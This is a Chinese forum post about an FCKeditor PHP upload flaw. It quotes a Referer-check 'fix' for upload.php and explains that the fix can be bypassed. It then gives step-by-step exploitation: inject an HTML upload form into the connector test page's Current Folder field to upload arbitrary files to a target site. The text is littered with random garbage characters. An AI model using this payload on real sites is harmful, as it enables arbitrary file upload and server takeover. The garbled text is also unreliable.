漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
~/ y5 I6 J( d, A6 k网上给出的修复方案是
2 R! V* }% Z* x& M% B修复方法,删除FCK编辑器用其他的编辑器0 b$ q3 b, `0 d
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
' O( i `9 d0 _" h R7 Z* k! ^在
) p- c t4 C5 J% u0 T) |) lrequire(‘config.php’);
% v+ V% F# U( L( T) w9 v8 Jrequire(‘util.php’);+ \& Z0 [- X6 w+ v' o+ I; g+ [0 r
的下面添加以下代码—————————–' ^& R5 ~+ e- c
//防止外部提交
0 c; \' `& U: r0 A: s' _2 ~, ufunction outsidepost()
8 N0 ~7 G( c u; F{: B+ A! K" ]( i( I! t, }9 J3 C
$servername=$_SERVER['SERVER_NAME'];
* b' K9 O7 N8 i" J2 J6 o! W$sub_from=@$_SERVER['HTTP_REFERER'];4 C' {: {5 n! \+ A1 ^9 P$ H
$sub_len=strlen($servername);
0 ]3 @( _2 C" ~* \2 O% n# @7 L. R$checkfrom=substr($sub_from,7,$sub_len);
. V0 W+ F h5 a6 h8 y7 Kif($checkfrom!=$servername){
+ ], Y$ u" T) ^7 c9 W% r' o3 Recho(“you don’t outsidepost!”);
/ @2 W; @3 {- ~exit;
& `6 D4 Q/ m+ y& ^" y& F}
8 L2 i2 _2 s" _) K}' z0 J( ?6 y; C/ |
outsidepost();$ R" J% J' O o
防止外部提交,但是没有防止内部提交,
% k( e) k' ?; j3 M利用方法:
' u' B' M3 }0 f, O' ?. e1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html b5 [5 [- y; z! x; o$ V
2,在Current Folder 框输入9 b! u, ~4 Z" q: k5 A" S4 m
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>% S. p! X8 C( i2 C/ Y
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
5 X: C- h7 V; l y( I! }PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对